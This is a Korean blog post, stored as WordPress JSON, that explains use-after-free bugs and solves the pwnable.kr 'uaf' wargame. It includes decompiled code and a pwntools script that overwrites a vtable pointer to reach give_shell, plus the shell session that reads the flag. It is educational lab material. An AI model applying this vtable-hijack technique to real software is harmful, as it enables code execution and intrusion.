{"id":1452,"date":"2024-01-29T21:04:48","date_gmt":"2024-01-29T12:04:48","guid":{"rendered":"https:\/\/h4ck.kr\/?p=1452"},"modified":"2024-05-22T02:20:52","modified_gmt":"2024-05-21T17:20:52","slug":"uaf","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=1452","title":{"rendered":"uaf"},"content":{"rendered":"\n

UAF \ucde8\uc57d\uc810\uc774\ub780<\/h2>\n\n\n\n

\uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\ud558\uace0\ub098\uc11c,
\uc774\uc804\uc758 \ub611\uac19\uc740 \ud06c\uae30\ub85c \ud560\ub2f9\ud588\ub358 \uba54\ubaa8\ub9ac \uc601\uc5ed\uc744 \ud560\ub2f9\ud574\uc11c \ucc38\uc870\ud558\ub294 \ucde8\uc57d\uc810.
<\/p>\n\n\n\n

\uc608\uc81c \ucf54\ub4dc:<\/p>\n\n\n\n

\n
\n
#include <stdio.h>\n#include <string.h>\n\nint main(void) {\n        char *ptr = malloc(8);\n        strcpy(ptr, \"hellowor\");\n        free(ptr);\n\n        char* ptr2 = malloc(8);\n        strcpy(ptr2, \"abcdefg\");\n\n        printf(\"ptr: %s\\n\", ptr);\n        return 0;\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\uacb0\uacfc:<\/p>\n\n\n\n
\n
\n
ptr: abcdefg<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\ubcf4\ub2e4\uc2dc\ud53c free(ptr)<\/code>\ub85c ptr\uc744 \uba54\ubaa8\ub9ac \ud560\ub2f9\uc744 \ud574\uc81c \ud6c4, <\/p>\n\n\n\n
ptr2\uc5d0 \uc774\uc804 ptr1\uacfc \uac19\uc740 \ud06c\uae30\uc758 \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\uace0 
ptr \ub370\uc774\ud130\ub97c \ud655\uc778\ud574\ubcf4\uba74,
ptr2\uc758 \ub370\uc774\ud130\uac00 \ucd9c\ub825\ub418\ub294 \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\n\n\n\n
Description<\/h2>\n\n\n\n
Mommy, what is Use After Free bug?<\/p>\n\n\n\n
ssh uaf@pwnable.kr -p2222 (pw:guest)<\/p>\n\n\n\n
\n\n\n\n
checksec<\/h2>\n\n\n\n
\n
\n
uaf@pwnable:~$ checksec --file .\/uaf\n[*] '\/home\/uaf\/uaf'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)<\/pre>\n<\/div>\n<\/div>\n\n\n\n
\n\n\n\n
Decompiled-src<\/h2>\n\n\n\n
main<\/h2>\n\n\n\n
\n
\n
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)\n{\n  Human *v3; \/\/ rbx\n  __int64 v4; \/\/ rdx\n  Human *v5; \/\/ rbx\n  int v6; \/\/ eax\n  __int64 v7; \/\/ rax\n  Human *v8; \/\/ rbx\n  Human *v9; \/\/ rbx\n  char v10[16]; \/\/ [rsp+10h] [rbp-50h] BYREF\n  char v11[8]; \/\/ [rsp+20h] [rbp-40h] BYREF\n  Human *v12; \/\/ [rsp+28h] [rbp-38h]\n  Human *v13; \/\/ [rsp+30h] [rbp-30h]\n  size_t nbytes; \/\/ [rsp+38h] [rbp-28h]\n  void *buf; \/\/ [rsp+40h] [rbp-20h]\n  int v16; \/\/ [rsp+48h] [rbp-18h] BYREF\n  char v17; \/\/ [rsp+4Eh] [rbp-12h] BYREF\n  char v18[17]; \/\/ [rsp+4Fh] [rbp-11h] BYREF\n\n  std::allocator<char>::allocator(&v17, argv, envp);\n  std::string::string(v10, \"Jack\", &v17);\n  v3 = (Human *)operator new(0x18uLL);\n  Man::Man(v3, v10, 25LL);\n  v12 = v3;\n  std::string::~string((std::string *)v10);\n  std::allocator<char>::~allocator(&v17);\n  std::allocator<char>::allocator(v18, v10, v4);\n  std::string::string(v11, \"Jill\", v18);\n  v5 = (Human *)operator new(0x18uLL);\n  Woman::Woman(v5, v11, 21LL);\n  v13 = v5;\n  std::string::~string((std::string *)v11);\n  std::allocator<char>::~allocator(v18);\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        std::operator<<<std::char_traits<char>>(&std::cout, \"1. use\\n2. after\\n3. free\\n\");\n        std::istream::operator>>(&std::cin, &v16);\n        if ( v16 != 2 )\n          break;\n        nbytes = atoi(argv[1]);\n        buf = (void *)operator new[](nbytes);\n        v6 = open(argv[2], 0);\n        read(v6, buf, nbytes);\n        v7 = std::operator<<<std::char_traits<char>>(&std::cout, \"your data is allocated\");\n        std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);\n      }\n      if ( v16 == 3 )\n        break;\n      if ( v16 == 1 )\n      {\n        (*(void (__fastcall **)(Human *))(*(_QWORD *)v12 + 8LL))(v12);\n        (*(void (__fastcall **)(Human *))(*(_QWORD *)v13 + 8LL))(v13);\n      }\n    }\n    v8 = v12;\n    if ( v12 )\n    {\n      Human::~Human(v12);\n      operator delete(v8);\n    }\n    v9 = v13;\n    if ( v13 )\n    {\n      Human::~Human(v13);\n      operator delete(v9);\n    }\n  }\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n
0x18\ub9cc\ud07c \uba54\ubaa8\ub9ac\ub97c 2\ubc88 \ud799\uc601\uc5ed\uc73c\ub85c\ubd80\ud130 \ud560\ub2f9 \ubc1b\uc544\uc11c 
\uac01\uac01 v3, v5\uc5d0 \uc8fc\uc18c\ub97c \ub2f4\ub294\ub2e4.<\/p>\n\n\n\n
\uc9c1\uc811 \ub514\ubc84\uae45\ud574\uc11c \ud655\uc778\ud574\ubcf4\uba74,
v3\ub294 0x614EE0, v5\ub294 0x614F30 \uc8fc\uc18c<\/strong>\uc5d0 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n
0x18\ub9cc\ud07c \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac \uc8fc\uc18c\ub97c \uac01\uac01 \uc0b4\ud3b4\ubcf4\uba74, \uc544\ub798\uc640 \uac19\ub2e4.

<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\ud560\ub2f9\ud558\uace0\ub098\uc11c \uc0ac\uc6a9\uc790\ub85c\ubd80\ud130 \uc785\ub825\uc744 \ubc1b\uc544\uc628\ub2e4.<\/p>\n\n\n\n
1\ubc88\uc744 \uc785\ub825\ud558\uba74, \uac01 vtable + 0x18 \uc8fc\uc18c\uc5d0 \uc788\ub294 \ud568\uc218\uc778 introduce\uac00 \ud638\ucd9c\ub418\uc5b4,
\uc544\ub798\uc640 \uac19\uc774 \ucd9c\ub825\ub41c\ub2e4.<\/p>\n\n\n\n
\n
\n
My name is Jack\nI am 25 years old\nI am a nice guy!\nMy name is Jill\nI am 21 years old\nI am a cute girl!<\/pre>\n<\/div>\n<\/div>\n\n\n\n
2\ubc88\uc744 \uc785\ub825\ud558\uba74,
argv[1]<\/code> \ud06c\uae30 \ub9cc\ud07c \uba54\ubaa8\ub9ac\ub97c buf<\/code>\uc5d0 \ud799\uc601\uc5ed\uc73c\ub85c\ubd80\ud130 \ud560\ub2f9\ud558\uace0,
\uc77d\uae30 \uc804\uc6a9\ubaa8\ub4dc\ub85c argv[2]<\/code> \ud30c\uc77c\uc744 \uc5f4\uace0 \uc77d\uc740 \ub0b4\uc6a9\uc744 buf<\/code>\ub85c \uac00\uc838\uc628\ub2e4.<\/p>\n\n\n\n
3\ubc88\uc744 \uc785\ub825\ud558\uba74,
\ucc98\uc74c\uc5d0 0x18\ub9cc\ud07c \uba54\ubaa8\ub9ac 2\ubc88 \ud560\ub2f9\ub418\uc5c8\ub358 \uacf3\uc744 \ud574\uc81c\ud55c\ub2e4.<\/p>\n\n\n\n
\n\n\n\n
Solution<\/h2>\n\n\n\n
\ucc98\uc74c \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\ud560 \ub54c, 0x18\ub9cc\ud07c \uba54\ubaa8\ub9ac\ub97c 2\ubc88 \ud560\ub2f9\ud558\uae30 \ub54c\ubb38\uc5d0
UAF \ucde8\uc57d\uc810\uc744 \uc774\uc6a9\ud574\uc11c \uc6d0\ud558\ub294 \uba54\ubaa8\ub9ac \uc8fc\uc18c\ub85c \uc774\ub3d9\ud574 \ud638\ucd9c\ud558\ub294 \ubc29\ubc95\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n
\uba3c\uc800, 3\ubc88\uc744 \uc785\ub825\ud558\uc5ec 2\ubc88 \ud799\uc601\uc5ed\uc73c\ub85c\ubd80\ud130 \uba54\ubaa8\ub9ac\uac00 \ud560\ub2f9\ub418\uc5c8\ub358 \uc8fc\uc18c\ub97c \ud574\uc81c\ud574\uc900\ub2e4.<\/p>\n\n\n\n
\ub450\ubc88\uc9f8\ub85c, 2\ubc88\uc744 \uc785\ub825\ud558\uc5ec 0x18\ub9cc\ud07c \uac19\uc740 \ud06c\uae30\uc758 \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\uac8c \ub9cc\ub4e4\uace0, 
\ud560\ub2f9\ub418\ub294 \uc8fc\uc18c\uc5d0\ub294 (give_shell\uc744 \uac00\ub9ac\ud0a4\ub294 \uc8fc\uc18c - 8<\/code>)\uc774 \ub4e4\uc5b4\uac00\uac8c \ub9cc\ub4e4\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
v13\uc774 \ub9c8\uc9c0\ub9c9\uc73c\ub85c \ud574\uc81c\ud558\ubbc0\ub85c, 
v12\uac00 \uc7ac\uc0ac\uc6a9\ub418\uac8c \ud560\ub824\uba74,
2\ubc88 \ud638\ucd9c\ud574\uc57c\ud55c\ub2e4.<\/p>\n\n\n\n
\uadf8\ub9ac\uace0 \ub9c8\uc9c0\ub9c9\uc73c\ub85c 3\ubc88\uc744 \ud1b5\ud574 \ud568\uc218\ub97c \ud638\ucd9c\ud558\uac8c\ub418\uba74, 
give_shell \ud568\uc218\uac00 \ud638\ucd9c\ub418\uc5b4 \uc258\uc744 \ud68d\ub4dd\ud560 \uc218 \uc788\uc744 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
solve.py<\/h2>\n\n\n\n
\n
\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64',os='linux')\nwarnings.filterwarnings('ignore')\n\n#p1 = process([\".\/uaf\", \"24\", \"\/dev\/stdin\"])\n#p1 = process(executable=\"\/home\/iotfragile\/CTF\/uaf\/uaf\", argv=[\"\/home\/iotfragile\/CTF\/uaf\/uaf\", \"24\", \"\/dev\/stdin\"])\n\np = ssh(\"uaf\", \"pwnable.kr\", port=2222, password=\"guest\")\np1 = p.process(executable=\"\/home\/uaf\/uaf\", argv=[\"\/home\/uaf\/uaf\", \"24\", \"\/dev\/stdin\"])\n\np1.recvuntil(\"3. free\\n\")\np1.sendline(\"3\")\n\nfor i in range(2):\n    p1.recvuntil(\"3. free\\n\")\n    p1.sendline(\"2\")\n    p1.send(p64(0x401548))\n\np1.recvuntil(\"3. free\")\np1.sendline(\"1\")\n\np1.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n
Result<\/h2>\n\n\n\n
\n
\n
iotfragile@iotfragile:~\/CTF\/uaf$ python3 solve.py\n[+] Connecting to pwnable.kr on port 2222: Done\n[*] uaf@pwnable.kr:\n    Distro    Ubuntu 16.04\n    OS:       linux\n    Arch:     amd64\n    Version:  4.4.179\n    ASLR:     Enabled\n[+] Starting remote process bytearray(b'\/home\/uaf\/uaf') on pwnable.kr: pid 109075\n[*] Switching to interactive mode\n\n$ $ ls\nflag  uaf  uaf.cpp\n$ $ cat flag\nyay_f1ag_aft3r_pwning\n$ $<\/pre>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
UAF \ucde8\uc57d\uc810\uc774\ub780 \uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\ud558\uace0\ub098\uc11c,\uc774\uc804\uc758 \ub611\uac19\uc740 \ud06c\uae30\ub85c \ud560\ub2f9\ud588\ub358 \uba54\ubaa8\ub9ac \uc601\uc5ed\uc744 \ud560\ub2f9\ud574\uc11c \ucc38\uc870\ud558\ub294 \ucde8\uc57d\uc810. \uc608\uc81c \ucf54\ub4dc: \uacb0\uacfc: \ubcf4\ub2e4\uc2dc\ud53c free(ptr)\ub85c ptr\uc744 \uba54\ubaa8\ub9ac \ud560\ub2f9\uc744 \ud574\uc81c \ud6c4, ptr2\uc5d0 \uc774\uc804 ptr1\uacfc \uac19\uc740 \ud06c\uae30\uc758 \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\uace0 ptr \ub370\uc774\ud130\ub97c \ud655\uc778\ud574\ubcf4\uba74,ptr2\uc758 \ub370\uc774\ud130\uac00 \ucd9c\ub825\ub418\ub294 \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4. Description Mommy, what is Use After Free bug? ssh uaf@pwnable.kr -p2222 (pw:guest) checksec Decompiled-src main 0x18\ub9cc\ud07c \uba54\ubaa8\ub9ac\ub97c… \ub354 \ubcf4\uae30 »uaf<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-1452","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1452","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1452"}],"version-history":[{"count":4,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1452\/revisions"}],"predecessor-version":[{"id":1458,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1452\/revisions\/1458"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}